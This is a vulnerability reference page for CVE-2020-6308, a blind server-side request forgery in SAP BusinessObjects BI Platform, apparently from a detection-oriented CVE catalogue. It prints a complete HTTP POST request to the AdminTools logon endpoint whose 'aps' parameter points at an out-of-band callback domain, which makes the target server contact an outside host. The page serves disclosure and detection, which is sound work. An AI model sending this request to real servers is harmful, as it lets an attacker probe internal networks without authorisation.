🔙 목록으로 돌아가기

CVE-2020-6308: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery

TitleSAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
Authormadrobot
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks.
RemediationApply the relevant security patches provided by SAP to mitigate this vulnerability.
CVSS Score5.3
EPSS Score0.82056
CVE IDCVE-2020-6308
CWE IDCWE-918
Tags cve2020 cve sap ssrf oast unauth vkev vuln

🔍 Vulnerability Description

SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.

🌐 HTTP Request

POST /AdminTools/querybuilder/logon?framework HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

aps=d5jp1hple0o3cn7c0k40wx8jkidos11jz.oast.fun&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-6308.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-6308.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A